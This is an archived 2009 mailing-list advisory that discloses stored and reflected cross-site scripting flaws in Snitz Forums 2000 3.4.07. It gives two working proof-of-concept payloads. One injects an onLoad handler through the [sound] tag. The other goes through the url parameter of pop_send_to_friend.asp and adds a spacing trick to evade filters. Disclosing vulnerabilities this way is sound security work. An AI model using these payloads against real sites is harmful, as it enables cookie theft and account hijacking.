| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <900ea070910150850q4b65daf1m2ecee1edfb29035f@mail.gmail.com> Date: Thu, 15 Oct 2009 17:50:10 +0200 From: Andrea Fabrizi <andrea.fabrizi@...il.com> To: bugtraq@...urityfocus.com, websecurity@...appsec.org, webappsec@...urityfocus.com, full-disclosure@...ts.grok.org.uk Subject: Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilities ************************************************************** Application: Snitz Forums 2000 Version affected: 3.4.07 Website: http://forum.snitz.com/ Discovered By: Andrea Fabrizi Email: andrea.fabrizi@...il.com Web: http://www.andreafabrizi.it Vuln: Multiple Cross-Site Scripting ************************************************************** ###### PERMANENT XSS If [sound] tag is allowed: [sound]http://url_to_valid_mp3_or_m3u_file.m3u" onLoad="alert(document.cookie)[/sound] ###### ###### LINK XSS http://localhost/forum/pop_send_to_friend.asp?url=</textarea><img src="http://www.google.it/intl/it_it/images/logo.gif" onLoad ="alert(document.cookie)"> Note the space: onLoad<space>="alert(document.cookie)" ###### -- Andrea Fabrizi http://www.andreafabrizi.it
Powered by blists - more mailing lists